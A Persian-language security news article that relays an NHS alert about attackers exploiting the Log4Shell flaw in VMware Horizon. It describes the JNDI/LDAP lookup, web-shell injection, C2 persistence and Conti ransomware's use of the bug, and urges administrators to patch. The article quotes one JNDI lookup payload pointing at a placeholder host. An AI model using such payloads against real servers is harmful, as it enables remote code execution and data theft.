نماد سایت اتاق خبر شبکه گستر

سوءاستفاده هکرها از Log4Shell در VMware Horizon

برخی منابع درخصوص سوءاستفاده مهاجمانی ناشناس از ضعف امنیتی Log4Shell در VMware Horizon هشدار داده‌اند.

در این گزارش که با همکاری شرکت مهندسی شبکه گستر و مرکز مدیریت راهبردی افتای ریاست جمهوری تهیه گردیده، حملات مذکور مورد بررسی قرار گرفته است.

Log4Shell یا LogJam اولین آسیب‌پذیری است که در هفته‌های اخیر در کتابخانه Log4j کشف شد و دارای شناسه CVE-2021-44228 می‌باشد. سوءاستفاده گسترده از ضعف امنیتی مذکور، پس از انتشار یک نمونه اثبات‌گر (Proof-of-Concept – به اختصار PoC) در GitHub از حدود 18 آذر آغاز شد.

آسیب‌پذیری مذکور، حملاتی از نوع “اجرای کد از راه دور” (Remote Code Execution – به اختصار RCE) را برای مهاجمان فراهم می‌کند. با توجه به استفاده گسترده Log4j و از آنجایی که سوءاستفاده از ضعف امنیتی مذکور نیازی به تخصص فنی سطح بالا و احراز هویت ندارد، آسیب‌پذیری مذکور به کابوسی برای سازمان‌ها در سراسر جهان تبدیل شده و کاربران خانگی و سازمان‌ها را در معرض خطر قرار می‌دهد. از این رو، شرکت آپاچی ضعف امنیتی فوق و سه آسیب‌پذیری شناسایی شده پس از آن را از طریق به‌روز‌رسانی‌های امنیتی بعدی برطرف کرد. اکنون 2.17.1 ایمن‌ترین نسخه برای Log4j در نظر گرفته می‌شود.

طبق اطلاعیه‌ای که به تازگی NHS صادر کرده و مشروح آن در نشانی زیر قابل دسترس است، مهاجمان از این ضعف امنیتی برای اجرای کد از راه دور در نسخ آسیب‌پذیر VMware Horizon در زیرساخت‌های عمومی سوءاستفاده می‌کنند.

https://digital.nhs.uk/cyber-alerts/2022/cc-4002

این سازمان احتمال داده است که سوءاستفاده مذکور تنها مرحله شناسایی (Reconnaissance Phase) است، که مهاجمان با سوءاستفاده از Log4Shell از Java Naming and Directory InterfaceTM – به اختصار JNDI – برای شناسایی زیرساخت‌های مخرب استفاده می‌کنند.

زمانی که آسیب‌پذیری شناسایی می‌شود، مهاجم از Lightweight Directory Access Protocol (LDAP) برای بازیابی و اجرای یک فایل مخرب مبتنی بر Java استفاده کرده و یک پوسته وب (Web Shell) را به سرویس VM Blast Secure Gateway تزریق می‌کند.

مهاجمان می‌توانند از پوسته وب مذکور برای انجام فعالیت‌های مخربی همچون استقرار بدافزار، استخراج داده‌ها یا اجرای باج‌افزار استفاده کنند. مهاجمان از وجود سرویس Apache Tomcat تعبیه شده در VMware Horizon که در برابر Log4Shell آسیب‌پذیر است، سوءاستفاده می‌کند. سوءاستفاده معمولاً با کد ساده و پرکاربرد {jndi:ldap://example.com}$ آغاز شده و فرمان PowerShell زیر را از Tomcat ایجاد می‌کند.

 

این فرمان یک سرویس از Win32 را جهت دریافت فهرستی از اسامی سرویس VMBlastSG فراخوانی نموده، مسیرها را بازیابی کرده و “absg-worker.js” را تغییر می‌دهد تا یک Listener را بارگذاری نماید و سپس سرویس را به منظور فعال شدن کد اصلی مخرب مجدداً راه‌اندازی می‌کند.

Listener بارگذاری شده، مسئول اجرای فرامین دلخواه دریافت شده از طریق HTTP/HTTPS است که به عنوان Header در رشته داده‌های تعبیه شده، درج شده است. در این مرحله، مهاجم ارتباط مستمر و پایداری با سرور C2 برقرار کرده و می‌تواند داده‌ها را استخراج، فرامین را اجرا یا باج‌افزار را مستقر کند.

 

 

VMware Horizon تنها محصول VMware نیست که توسط مهاجمان با سوءاستفاده از آسیب‌پذیری Log4j مورد هدف قرار گرفته است.

باج‌افزار Conti نیز از Log4Shell جهت گسترش دامنه آلودگی در سرورهای آسیب‌پذیر VMware vCenter و رمزگذاری آسان‌تر ماشین‌های مجازی استفاده می‌کند.

NHS در گزارش خود به سه نشانه از بهره‌جویی در سیستم‌های آسیب‌پذیر اشاره کرده است:

 

 

 

 

شرکت وی‌ام‌ور (.VMware, Inc)، ماه گذشته یک به‌روزرسانی امنیتی برای Horizon و سایر محصولات خود منتشر نمود و ضعف‌های امنیتی به شناسه‌های CVE-2021-44228 و CVE-2021-45046 را با انتشار نسخه‌های 2111، 7.13.1 و 7.10.3 ترمیم کرد.

به تمام راهبران محصولات VMware توصیه می‌شود در اسرع وقت با مراجعه به نشانی زیر نسبت به به‌روزرسانی محصولات خود اقدام کرده تا از گزند این حملات در امان باشند:

https://www.vmware.com/security/advisories/VMSA-2021-0028.html

 

منبع:

https://www.bleepingcomputer.com/news/security/nhs-warns-of-hackers-exploiting-log4shell-in-vmware-horizon/

خروج از نسخه موبایل